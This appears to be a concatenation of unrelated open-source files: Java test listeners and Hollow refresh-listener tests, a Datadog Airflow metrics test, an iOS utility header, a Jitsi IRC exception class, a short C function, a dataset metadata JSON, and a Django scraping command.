AtomicInteger(); private final AtomicInteger numTestFinished = new AtomicInteger(); private final AtomicInteger numTestIgnored = new AtomicInteger(); private final boolean printToConsole; private final RunListener target; private void print( String event, Description description ) { if ( printToConsole ) { System.out.println( Thread.currentThread().toString() + ", event = " + event + ", " + description ); } } private void print( String event, Result description ) { if ( printToConsole ) { System.out.println( Thread.currentThread().toString() + ", event = " + event + ", " + description ); } } private void print( String event, Failure description ) { if ( printToConsole ) { System.out.println( Thread.currentThread().toString() + ", event = " + event + ", " + description ); } } public DiagnosticRunListener( boolean printToConsole, RunListener target ) { this.printToConsole = printToConsole; this.target = target; } @Override public void testRunStarted( Description description ) throws Exception { print( "testRunStarted", description ); if ( target != null ) { target.testRunStarted( description ); } } @Override public void testRunFinished( Result result ) throws Exception { print( "testRunFinished", result 
); if ( target != null ) { target.testRunFinished( result ); } } @Override public void testStarted( Description description ) throws Exception { numTestStarted.incrementAndGet(); print( "testStarted", description ); if ( target != null ) { target.testStarted( description ); } } @Override public void testFinished( Description description ) throws Exception { numTestFinished.incrementAndGet(); print( "testFinished", description ); if ( target != null ) { target.testFinished( description ); } } @Override public void testFailure( Failure failure ) throws Exception { numTestFailed.incrementAndGet(); print( "testFailure", failure ); if ( target != null ) { target.testFailure( failure ); } } @Override public void testAssumptionFailure( Failure failure ) { numTestAssumptionsFailed.incrementAndGet(); print( "testAssumptionFailure", failure ); if ( target != null ) { target.testAssumptionFailure( failure ); } } @Override public void testIgnored( Description description ) throws Exception { numTestIgnored.incrementAndGet(); print( "testIgnored", description ); if ( target != null ) { target.testIgnored( description ); } } @Override public String toString() { return "DiagnosticRunListener{" + "numTestIgnored=" + numTestIgnored + ", numTestStarted=" + numTestStarted + ", numTestFailed=" + numTestFailed + ", numTestAssumptionsFailed=" + numTestAssumptionsFailed + ", numTestFinished=" + numTestFinished + '}'; } }
2,036
1,103
/* * Copyright 2016-2019 Netflix, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * */ package com.netflix.hollow.api.consumer; import com.netflix.hollow.api.consumer.HollowConsumer.AbstractRefreshListener; import com.netflix.hollow.api.consumer.HollowConsumer.Blob; import com.netflix.hollow.api.consumer.HollowConsumer.ObjectLongevityConfig; import com.netflix.hollow.api.custom.HollowAPI; import com.netflix.hollow.api.objects.generic.GenericHollowObject; import com.netflix.hollow.api.producer.HollowProducer; import com.netflix.hollow.api.producer.HollowProducer.Populator; import com.netflix.hollow.api.producer.HollowProducer.WriteState; import com.netflix.hollow.api.producer.fs.HollowInMemoryBlobStager; import com.netflix.hollow.core.read.engine.HollowReadStateEngine; import java.util.ArrayList; import java.util.List; import org.junit.Assert; import org.junit.Before; import org.junit.Test; public class HollowRefreshListenerTests { private InMemoryBlobStore blobStore; private RecordingRefreshListener listener; private HollowProducer producer; private HollowConsumer consumer; @Before public void setUp() { blobStore = new InMemoryBlobStore(); listener = new RecordingRefreshListener(); producer = HollowProducer.withPublisher(blobStore) .withBlobStager(new HollowInMemoryBlobStager()) .withNumStatesBetweenSnapshots(Integer.MAX_VALUE) .build(); consumer = HollowConsumer.withBlobRetriever(blobStore) .withRefreshListener(listener) .withObjectLongevityConfig(new ObjectLongevityConfig() { @Override public long usageDetectionPeriodMillis() { return 100L; } @Override public long gracePeriodMillis() { return 100L; } @Override public boolean forceDropData() { return false; } @Override public boolean enableLongLivedObjectSupport() { return true; } @Override public boolean enableExpiredUsageStackTraces() { return false; } @Override public boolean dropDataAutomatically() { return true; } }) .build(); } @Test public void testRemoveDuplicateRefreshListeners() { HollowConsumer consumer = HollowConsumer.withBlobRetriever(blobStore) .withRefreshListener(listener) .withRefreshListener(listener) .build(); long v1 = runCycle(producer, 1); consumer.triggerRefreshTo(v1+1); Assert.assertEquals(1, listener.cycles); listener.clear(); long v2 = runCycle(producer, 2); consumer.addRefreshListener(listener); consumer.triggerRefreshTo(v2+1); Assert.assertEquals(1, listener.cycles); } @Test public void testCopyRefreshListeners() { List<HollowConsumer.RefreshListener> listeners = new ArrayList<>(); listeners.add(listener); HollowConsumer.Builder<?> b = new HollowConsumer.Builder() { @Override public HollowConsumer build() { return new HollowConsumer(blobRetriever, announcementWatcher, listeners, apiFactory, filterConfig, objectLongevityConfig, objectLongevityDetector, doubleSnapshotConfig, hashCodeFinder, refreshExecutor, memoryMode, metricsCollector); } }; HollowConsumer consumer = b.withBlobRetriever(blobStore).build(); long v1 = runCycle(producer, 1); listeners.clear(); consumer.triggerRefreshTo(v1+1); Assert.assertEquals(1, 
listener.cycles); } @Test public void testMethodSemanticsOnInitialRefresh() { long v1 = runCycle(producer, 1); long v2 = runCycle(producer, 2); long v3 = runCycle(producer, 3); long v4 = runCycle(producer, 4); long v5 = runCycle(producer, 5); consumer.triggerRefreshTo(v5+1); /// update occurred semantics Assert.assertEquals(1, listener.snapshotUpdateOccurredVersions.size()); Assert.assertEquals(v5, listener.snapshotUpdateOccurredVersions.get(0).longValue()); Assert.assertTrue(listener.deltaUpdateOccurredVersions.isEmpty()); /// applied semantics Assert.assertEquals(1, listener.snapshotAppliedVersions.size()); Assert.assertEquals(v1, listener.snapshotAppliedVersions.get(0).longValue()); Assert.assertEquals(4, listener.deltaAppliedVersions.size()); Assert.assertEquals(v2, listener.deltaAppliedVersions.get(0).longValue()); Assert.assertEquals(v3, listener.deltaAppliedVersions.get(1).longValue()); Assert.assertEquals(v4, listener.deltaAppliedVersions.get(2).longValue()); Assert.assertEquals(v5, listener.deltaAppliedVersions.get(3).longValue()); /// blobs loaded semantics Assert.assertEquals(5, listener.blobsLoadedVersions.size()); Assert.assertEquals(v1, listener.blobsLoadedVersions.get(0).longValue()); Assert.assertEquals(v2, listener.blobsLoadedVersions.get(1).longValue()); Assert.assertEquals(v3, listener.blobsLoadedVersions.get(2).longValue()); Assert.assertEquals(v4, listener.blobsLoadedVersions.get(3).longValue()); Assert.assertEquals(v5, listener.blobsLoadedVersions.get(4).longValue()); Assert.assertEquals(Long.MIN_VALUE, listener.refreshStartCurrentVersion); Assert.assertEquals(v5+1, listener.refreshStartRequestedVersion); Assert.assertEquals(Long.MIN_VALUE, listener.refreshSuccessBeforeVersion); Assert.assertEquals(v5, listener.refreshSuccessAfterVersion); Assert.assertEquals(v5+1, listener.refreshSuccessRequestedVersion); } @Test public void testMethodSemanticsOnSubsequentRefreshes() { long v0 = runCycle(producer, 0); consumer.triggerRefreshTo(v0); listener.clear(); long v1 = runCycle(producer, 1); long v2 = runCycle(producer, 2); long v3 = runCycle(producer, 3); consumer.triggerRefreshTo(v3); /// update occurred semantics Assert.assertEquals(0, listener.snapshotUpdateOccurredVersions.size()); Assert.assertEquals(3, listener.deltaUpdateOccurredVersions.size()); Assert.assertEquals(v1, listener.deltaUpdateOccurredVersions.get(0).longValue()); Assert.assertEquals(v2, listener.deltaUpdateOccurredVersions.get(1).longValue()); Assert.assertEquals(v3, listener.deltaUpdateOccurredVersions.get(2).longValue()); /// applied semantics Assert.assertEquals(0, listener.snapshotAppliedVersions.size()); Assert.assertEquals(3, listener.deltaAppliedVersions.size()); Assert.assertEquals(v1, listener.deltaAppliedVersions.get(0).longValue()); Assert.assertEquals(v2, listener.deltaAppliedVersions.get(1).longValue()); Assert.assertEquals(v3, listener.deltaAppliedVersions.get(2).longValue()); /// blobs loaded semantics Assert.assertEquals(3, listener.blobsLoadedVersions.size()); Assert.assertEquals(v1, listener.blobsLoadedVersions.get(0).longValue()); Assert.assertEquals(v2, listener.blobsLoadedVersions.get(1).longValue()); Assert.assertEquals(v3, listener.blobsLoadedVersions.get(2).longValue()); Assert.assertEquals(v0, listener.refreshStartCurrentVersion); Assert.assertEquals(v3, listener.refreshStartRequestedVersion); Assert.assertEquals(v0, listener.refreshSuccessBeforeVersion); Assert.assertEquals(v3, listener.refreshSuccessAfterVersion); Assert.assertEquals(v3, listener.refreshSuccessRequestedVersion); 
} @Test public void testObjectLongevityOnInitialUpdateCallbacks() { runCycle(producer, 1); runCycle(producer, 2); runCycle(producer, 3); runCycle(producer, 4); long v5 = runCycle(producer, 5); final List<GenericHollowObject> snapshotOrdinal0Objects = new ArrayList<GenericHollowObject>(); final List<GenericHollowObject> deltaOrdinal0Objects = new ArrayList<GenericHollowObject>(); final List<GenericHollowObject> deltaOrdinal1Objects = new ArrayList<GenericHollowObject>(); HollowConsumer.RefreshListener longevityListener = new AbstractRefreshListener() { public void snapshotApplied(HollowAPI api, HollowReadStateEngine stateEngine, long version) throws Exception { snapshotOrdinal0Objects.add(new GenericHollowObject(api.getDataAccess(), "Integer", 0)); } public void deltaApplied(HollowAPI api, HollowReadStateEngine stateEngine, long version) throws Exception { deltaOrdinal0Objects.add(new GenericHollowObject(api.getDataAccess(), "Integer", 0)); deltaOrdinal1Objects.add(new GenericHollowObject(api.getDataAccess(), "Integer", 1)); } }; consumer.addRefreshListener(longevityListener); consumer.triggerRefreshTo(v5); Assert.assertEquals(1, snapshotOrdinal0Objects.get(0).getInt("value")); Assert.assertEquals(2, deltaOrdinal1Objects.get(0).getInt("value")); Assert.assertEquals(3, deltaOrdinal0Objects.get(1).getInt("value")); Assert.assertEquals(4, deltaOrdinal1Objects.get(2).getInt("value")); Assert.assertEquals(5, deltaOrdinal0Objects.get(3).getInt("value")); } @Test public void testAddListenerDuringRefresh() { HollowConsumer consumer = HollowConsumer.withBlobRetriever(blobStore) .build(); class SecondRefreshListener extends AbstractRefreshListener { int refreshStarted; int refreshSuccessful; @Override public void refreshStarted(long currentVersion, long requestedVersion) { refreshStarted++; } @Override public void refreshSuccessful(long beforeVersion, long afterVersion, long requestedVersion) { refreshSuccessful++; } }; class FirstRefreshListener extends SecondRefreshListener { SecondRefreshListener srl = new SecondRefreshListener(); @Override public void refreshStarted(long currentVersion, long requestedVersion) { super.refreshStarted(currentVersion, requestedVersion); // Add the second listener concurrently during a refresh consumer.addRefreshListener(srl); } }; FirstRefreshListener frl = new FirstRefreshListener(); consumer.addRefreshListener(frl); long v1 = runCycle(producer, 1); consumer.triggerRefreshTo(v1+1); Assert.assertEquals(1, frl.refreshStarted); Assert.assertEquals(1, frl.refreshSuccessful); Assert.assertEquals(0, frl.srl.refreshStarted); Assert.assertEquals(0, frl.srl.refreshSuccessful); long v2 = runCycle(producer, 2); consumer.triggerRefreshTo(v2+1); Assert.assertEquals(2, frl.refreshStarted); Assert.assertEquals(2, frl.refreshSuccessful); Assert.assertEquals(1, frl.srl.refreshStarted); Assert.assertEquals(1, frl.srl.refreshSuccessful); } @Test public void testRemoveListenerDuringRefresh() { HollowConsumer consumer = HollowConsumer.withBlobRetriever(blobStore) .build(); class SecondRefreshListener extends AbstractRefreshListener { int refreshStarted; int refreshSuccessful; @Override public void refreshStarted(long currentVersion, long requestedVersion) { refreshStarted++; } @Override public void refreshSuccessful(long beforeVersion, long afterVersion, long requestedVersion) { refreshSuccessful++; } }; class FirstRefreshListener extends SecondRefreshListener { SecondRefreshListener srl; FirstRefreshListener(SecondRefreshListener srl) { this.srl = srl; } @Override public void 
refreshStarted(long currentVersion, long requestedVersion) { super.refreshStarted(currentVersion, requestedVersion); // Remove the second listener concurrently during a refresh consumer.removeRefreshListener(srl); } }; SecondRefreshListener srl = new SecondRefreshListener(); FirstRefreshListener frl = new FirstRefreshListener(srl); consumer.addRefreshListener(frl); consumer.addRefreshListener(srl); long v1 = runCycle(producer, 1); consumer.triggerRefreshTo(v1+1); Assert.assertEquals(1, frl.refreshStarted); Assert.assertEquals(1, frl.refreshSuccessful); Assert.assertEquals(1, frl.srl.refreshStarted); Assert.assertEquals(1, frl.srl.refreshSuccessful); long v2 = runCycle(producer, 2); consumer.triggerRefreshTo(v2+1); Assert.assertEquals(2, frl.refreshStarted); Assert.assertEquals(2, frl.refreshSuccessful); Assert.assertEquals(1, frl.srl.refreshStarted); Assert.assertEquals(1, frl.srl.refreshSuccessful); } private long runCycle(HollowProducer producer, final int cycleNumber) { return producer.runCycle(new Populator() { public void populate(WriteState state) throws Exception { state.add(Integer.valueOf(cycleNumber)); } }); } private class RecordingRefreshListener extends AbstractRefreshListener { long cycles; long refreshStartCurrentVersion; long refreshStartRequestedVersion; long refreshSuccessBeforeVersion; long refreshSuccessAfterVersion; long refreshSuccessRequestedVersion; List<Long> snapshotUpdateOccurredVersions = new ArrayList<Long>(); List<Long> deltaUpdateOccurredVersions = new ArrayList<Long>(); List<Long> blobsLoadedVersions = new ArrayList<Long>(); List<Long> snapshotAppliedVersions = new ArrayList<Long>(); List<Long> deltaAppliedVersions = new ArrayList<Long>(); @Override public void refreshStarted(long currentVersion, long requestedVersion) { cycles++; this.refreshStartCurrentVersion = currentVersion; this.refreshStartRequestedVersion = requestedVersion; } @Override public void snapshotUpdateOccurred(HollowAPI api, HollowReadStateEngine stateEngine, long version) throws Exception { snapshotUpdateOccurredVersions.add(version); } @Override public void deltaUpdateOccurred(HollowAPI api, HollowReadStateEngine stateEngine, long version) throws Exception { deltaUpdateOccurredVersions.add(version); } @Override public void blobLoaded(Blob transition) { blobsLoadedVersions.add(transition.getToVersion()); } @Override public void refreshSuccessful(long beforeVersion, long afterVersion, long requestedVersion) { refreshSuccessBeforeVersion = beforeVersion; refreshSuccessAfterVersion = afterVersion; refreshSuccessRequestedVersion = requestedVersion; } @Override public void refreshFailed(long beforeVersion, long afterVersion, long requestedVersion, Throwable failureCause) { } @Override public void snapshotApplied(HollowAPI api, HollowReadStateEngine stateEngine, long version) throws Exception { snapshotAppliedVersions.add(version); } @Override public void deltaApplied(HollowAPI api, HollowReadStateEngine stateEngine, long version) throws Exception { deltaAppliedVersions.add(version); } public void clear() { cycles = 0; snapshotUpdateOccurredVersions.clear(); deltaUpdateOccurredVersions.clear(); blobsLoadedVersions.clear(); snapshotAppliedVersions.clear(); deltaAppliedVersions.clear(); } } }
7,308
663
# (C) Datadog, Inc. 2010-2019 # All rights reserved # Licensed under Simplified BSD License (see LICENSE) import re import pytest import requests # Make sure this expected metrics list is up to date with: # - `dogstatsd_mapper_profiles` configuration from README.md # - metadata.csv EXPECTED_METRICS = [ '<job_name>_start', '<job_name>_end', '<job_name>_heartbeat_failure', 'operator_failures_<operator_name>', 'operator_successes_<operator_name>', 'ti_failures', 'ti_successes', 'previously_succeeded', 'zombies_killed', 'scheduler_heartbeat', 'dag_processing.processes', 'dag_processing.manager_stalls', 'dag_file_refresh_error', 'scheduler.tasks.killed_externally', 'scheduler.orphaned_tasks.cleared', 'scheduler.orphaned_tasks.adopted', 'scheduler.critical_section_busy', 'sla_email_notification_failure', 'ti.start.<dagid>.<taskid>', 'ti.finish.<dagid>.<taskid>.<state>', 'dag.callback_exceptions', 'celery.task_timeout_error', 'task_removed_from_dag.<dagid>', 'task_restored_to_dag.<dagid>', 'task_instance_created-<operator_name>', 'dagbag_size', 'dag_processing.import_errors', 'dag_processing.total_parse_time', 'dag_processing.last_runtime.<dag_file>', 'dag_processing.last_run.seconds_ago.<dag_file>', 'dag_processing.processor_timeouts', 'scheduler.tasks.without_dagrun', 'scheduler.tasks.running', 'scheduler.tasks.starving', 'scheduler.tasks.executable', 'executor.open_slots', 'executor.queued_tasks', 'executor.running_tasks', 'pool.open_slots.<pool_name>', 'pool.queued_slots.<pool_name>', 'pool.running_slots.<pool_name>', 'pool.starving_tasks.<pool_name>', 'smart_sensor_operator.poked_tasks', 'smart_sensor_operator.poked_success', 'smart_sensor_operator.poked_exception', 'smart_sensor_operator.exception_failures', 'smart_sensor_operator.infra_failures', # 'pool.used_slots.<pool_name>' appears on https://airflow.apache.org/docs/1.10.11/metrics.html 'dagrun.dependency-check.<dag_id>', 'dag.<dag_id>.<task_id>.duration', 'dag_processing.last_duration.<dag_file>', 'dagrun.duration.success.<dag_id>', 'dagrun.duration.failed.<dag_id>', 'dagrun.schedule_delay.<dag_id>', 'scheduler.critical_section_duration', 'dagrun.<dag_id>.first_task_scheduling_delay', 'collect_db_dags', ] METRIC_PATTERN = re.compile(r'^``([^`]+)``\s+(.*)', re.MULTILINE) @pytest.mark.latest_metrics def test_check_metrics_up_to_date(): url = 'https://raw.githubusercontent.com/apache/airflow/master/docs/apache-airflow/logging-monitoring/metrics.rst' resp = requests.get(url) content = resp.content.decode('utf-8') matches = METRIC_PATTERN.findall(content) # Printed only on failure for convenience. print("Metric from {} :".format(url)) print("") for metric, desc in matches: print("{:50} {}".format(metric, desc)) metrics = [m for m, desc in matches] assert EXPECTED_METRICS == metrics
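As a quick illustration of what `METRIC_PATTERN` extracts from the upstream metrics page, the snippet below runs the same pattern over two invented rows that mimic the double-backtick metric name plus description layout of that reStructuredText table.

import re

METRIC_PATTERN = re.compile(r'^``([^`]+)``\s+(.*)', re.MULTILINE)

# invented sample rows in the style of the Airflow metrics.rst table
sample = (
    "``scheduler_heartbeat``      Scheduler heartbeats\n"
    "``ti_failures``              Overall task instances failures\n"
)

for metric, description in METRIC_PATTERN.findall(sample):
    print(metric, "->", description)
# scheduler_heartbeat -> Scheduler heartbeats
# ti_failures -> Overall task instances failures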
1,301
1,434
<filename>ios/Hera/Page/WDHUtils.h
//
// Copyright (c) 2017, <EMAIL>
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this
// list of conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice,
// this list of conditions and the following disclaimer in the documentation
// and/or other materials provided with the distribution.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
// AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
// IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
// DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
// FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
// DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
// CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
// OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
//

#import <UIKit/UIKit.h>

@interface WDHUtils : NSObject

+ (UIColor *)SMRGB:(unsigned int)rgbValue;
+ (UIColor *)SMRGBA:(unsigned int)rgbValue alpha:(float)alpha;

// Convert a color string such as #c60a1e into a UIColor
+ (UIColor *) WH_Color_Conversion:(NSString *)Color_Value;

/**
 Get the rendered size of a text string

 @param text the text to measure
 @param font the font used for rendering
 */
+ (CGSize)getTextSize:(NSString *)text font:(UIFont *)font;

/**
 Get the rendered height of a text string

 @param text the text to measure
 @param font the font used for rendering
 @param width the available width
 */
+ (CGFloat) getTextHeight:(NSString *)text font:(UIFont *)font width:(CGFloat)width;

/**
 Get the rendered width of a text string

 @param text the text to measure
 @param font the font used for rendering
 @param height the available height
 */
+ (CGFloat) getTextWidth:(NSString *)text font:(UIFont *)font height:(CGFloat)height;

/**
 Scale an image down to the given size
 */
+ (UIImage *)imageWithImage:(UIImage *)image scaledToSize:(CGSize)newSize;

/**
 Create a solid-color image

 @param rect the size of the generated image
 */
+ (UIImage *)imageFromColor:(UIColor *)color rect:(CGRect)rect;

@end
872
3,442
/* * Jitsi, the OpenSource Java VoIP and Instant Messaging client. * * Copyright @ 2015 Atlassian Pty Ltd * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package net.java.sip.communicator.impl.protocol.irc.exception; /** * Exception thrown in case an IRC command is used in the wrong way. * * @author <NAME> */ public class BadCommandInvocationException extends Exception { /** * Serialization id. */ private static final long serialVersionUID = 1L; /** * The original command line. */ private final String line; /** * The help text provided by the command. */ private final String help; /** * Constructor. * * @param line the original command line * @param help the help text provided by the command * @param cause the cause of the exception */ public BadCommandInvocationException(final String line, final String help, final Throwable cause) { super("The command failed because of incorrect usage: " + cause.getMessage(), cause); this.line = line; this.help = help; } /** * Get original command line. * * @return returns the original command line */ public String getLine() { return this.line; } /** * Get the help text provided by the command. * * @return returns command's help text */ public String getHelp() { return this.help; } }
667
412
/* Branch on the pointed-to value and return a result from each branch. */
int foo(int *x) {
  if (*x) {
    int y = 9;
    return y;
  } else {
    int z = 4;
    return z;
  }
}

int main() {
  int x = 1;  /* initialize before foo dereferences it */
  foo(&x);
  return 0;
}
71
3,395
{"plain_text": {"description": "\nElkarHizketak is a low resource conversational Question Answering\n(QA) dataset in Basque created by Basque speaker volunteers. The\ndataset contains close to 400 dialogues and more than 1600 question\nand answers, and its small size presents a realistic low-resource\nscenario for conversational QA systems. The dataset is built on top of\nWikipedia sections about popular people and organizations. The\ndialogues involve two crowd workers: (1) a student ask questions after\nreading a small introduction about the person, but without seeing the\nsection text; and (2) a teacher answers the questions selecting a span\nof text of the section. ", "citation": "@inproceedings{otegi-etal-2020-conversational,\n title = \"{Conversational Question Answering in Low Resource Scenarios: A Dataset and Case Study for {B}asque}\",\n author = \"<NAME> and\n <NAME> and\n <NAME> and\n <NAME> and\n <NAME>\",\n booktitle = \"Proceedings of the 12th Language Resources and Evaluation Conference\",\n year = \"2020\",\n publisher = \"European Language Resources Association\",\n url = \"https://aclanthology.org/2020.lrec-1.55\",\n pages = \"436--442\",\n ISBN = \"979-10-95546-34-4\",\n}\n", "homepage": "http://ixa.si.ehu.es/node/12934", "license": "Creative Commons Attribution-ShareAlike 4.0 International Public License (CC BY-SA 4.0)", "features": {"dialogue_id": {"dtype": "string", "id": null, "_type": "Value"}, "wikipedia_page_title": {"dtype": "string", "id": null, "_type": "Value"}, "background": {"dtype": "string", "id": null, "_type": "Value"}, "section_title": {"dtype": "string", "id": null, "_type": "Value"}, "context": {"dtype": "string", "id": null, "_type": "Value"}, "turn_ids": {"feature": {"dtype": "string", "id": null, "_type": "Value"}, "length": -1, "id": null, "_type": "Sequence"}, "questions": {"feature": {"dtype": "string", "id": null, "_type": "Value"}, "length": -1, "id": null, "_type": "Sequence"}, "yesnos": {"feature": {"num_classes": 3, "names": ["y", "n", "x"], "id": null, "_type": "ClassLabel"}, "length": -1, "id": null, "_type": "Sequence"}, "answers": {"feature": {"texts": {"feature": {"dtype": "string", "id": null, "_type": "Value"}, "length": -1, "id": null, "_type": "Sequence"}, "answer_starts": {"feature": {"dtype": "int32", "id": null, "_type": "Value"}, "length": -1, "id": null, "_type": "Sequence"}, "input_texts": {"feature": {"dtype": "string", "id": null, "_type": "Value"}, "length": -1, "id": null, "_type": "Sequence"}}, "length": -1, "id": null, "_type": "Sequence"}, "orig_answers": {"texts": {"feature": {"dtype": "string", "id": null, "_type": "Value"}, "length": -1, "id": null, "_type": "Sequence"}, "answer_starts": {"feature": {"dtype": "int32", "id": null, "_type": "Value"}, "length": -1, "id": null, "_type": "Sequence"}}}, "post_processed": null, "supervised_keys": null, "task_templates": null, "builder_name": "elkarhizketak", "config_name": "plain_text", "version": {"version_str": "1.0.0", "description": null, "major": 1, "minor": 0, "patch": 0}, "splits": {"train": {"name": "train", "num_bytes": 1024378, "num_examples": 301, "dataset_name": "elkarhizketak"}, "validation": {"name": "validation", "num_bytes": 125667, "num_examples": 38, "dataset_name": "elkarhizketak"}, "test": {"name": "test", "num_bytes": 127640, "num_examples": 38, "dataset_name": "elkarhizketak"}}, "download_checksums": {"http://ixa2.si.ehu.es/convai/elkarhizketak-v1.0/elkarhizketak-train-v1.0.json": {"num_bytes": 1543845, "checksum": 
"36674936820c9a5d8a5de144776dd57e2e4f5f63eec6ac45f93e47e5fd9daecd"}, "http://ixa2.si.ehu.es/convai/elkarhizketak-v1.0/elkarhizketak-dev-v1.0.json": {"num_bytes": 189736, "checksum": "fbf2e14b63de9a8406a9b44dccd0e2c4dcdf07724af737ccd05e06311a632f57"}, "http://ixa2.si.ehu.es/convai/elkarhizketak-v1.0/elkarhizketak-test-v1.0.json": {"num_bytes": 193893, "checksum": "311154feb69ede265ed695f97ab81811d78d837572114396b6e8779fdeb3e3f0"}}, "download_size": 1927474, "post_processing_size": null, "dataset_size": 1277685, "size_in_bytes": 3205159}}
1,515
395
<filename>api/management/commands/get_clues.py
# coding: utf-8
from __future__ import print_function, unicode_literals

from bs4 import BeautifulSoup

import requests
from django.core.management.base import BaseCommand

from core.models import Hellspawn


class Command(BaseCommand):
    def handle(self, *args, **options):
        # Scrape the clue table and store each clue on its Hellspawn record.
        url = 'http://www.18183.com/yys/201609/706902.html'
        result = requests.get(url).content
        soup = BeautifulSoup(result, 'html.parser')

        # Highlighted rows: the Hellspawn is expected to already exist.
        clues = soup.findAll('tr', {'class': 'li_on'})
        for itm in clues:
            clue = itm.find('td', {'class': 'jiacu'}).text.strip()
            hellspawn = itm.findAll('td')[1].find('span').text.strip()
            print(clue, hellspawn)
            hs = Hellspawn.objects.get(name=hellspawn)
            hs.clue1 = clue
            hs.save()

        # Regular rows: skip any Hellspawn that is not in the database yet.
        clues = soup.findAll('tr', {'class': 'li'})
        for itm in clues:
            clue = itm.find('td', {'class': 'jiacu'}).text.strip()
            hellspawn = itm.findAll('td')[1].find('span').text.strip()
            print(clue, hellspawn)
            if clue == 'xxxx':
                break
            else:
                hs = Hellspawn.objects.filter(name=hellspawn)
                if hs.exists():
                    hs = hs[0]
                    hs.clue1 = clue
                    hs.save()
                else:
                    print('does not exist: {0}'.format(hellspawn))
712